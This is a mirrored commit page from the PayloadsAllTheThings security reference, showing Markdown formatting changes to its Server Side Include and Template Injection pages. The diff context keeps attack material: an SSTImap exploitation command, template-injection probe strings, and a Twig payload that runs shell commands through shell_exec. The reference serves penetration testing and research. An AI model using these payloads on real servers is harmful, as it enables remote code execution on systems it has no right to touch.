Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2026-01-16 05:03:20 +01:00
Code Issues Projects Releases Wiki Activity

SSI, SSTI:

Browse source 
- Improved MarkDown
This commit is contained in:
vladko312 2026-01-03 22:20:19 +03:00
parent 4831e36fb8
commit 09a5f07345
4 changed files with 9 additions and 8 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
Server Side Include Injection/README.md
View file

@ -11,7 +11,7 @@
## Tools
- [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI`
* [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI`
```bash
python3 ./sstimap.py -u 'https://example.com/page?name=John' --legacy -s

2
Server Side Template Injection/Java.md
View file

@ -54,7 +54,7 @@
### Java EL - Basic Injection
> Java has multiple Expression Languages using similar syntax.
Java has multiple Expression Languages using similar syntax.
> Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.

1
Server Side Template Injection/PHP.md
View file

@ -167,6 +167,7 @@ $output = $twig > render (
```
With certain settings, Twig interrupts rendering, if any errors or warnings are raised. This payload works fine in these cases:
```php
{{ {'id':'shell_exec'}|map('call_user_func')|join }}
```

12
Server Side Template Injection/README.md
View file

@ -53,9 +53,9 @@
Original research:
- Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
- Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
- Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
* Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
* Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
* Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
#### Rendered
@ -117,7 +117,7 @@ ${{<%[%'"}}%\.
Common tags to test for SSTI with code evaluation:
```
```powershell
{{ ... }}
${ ... }
#{ ... }
@ -133,13 +133,13 @@ ${ ... }
Rendered SSTI can be checked by using mathematical expressions inside the tags:
```
```powershell
7 * 7
```
Error-Based SSTI can be checked by using this payload inside the tags:
```
```powershell
(1/0).zxy.zxy
```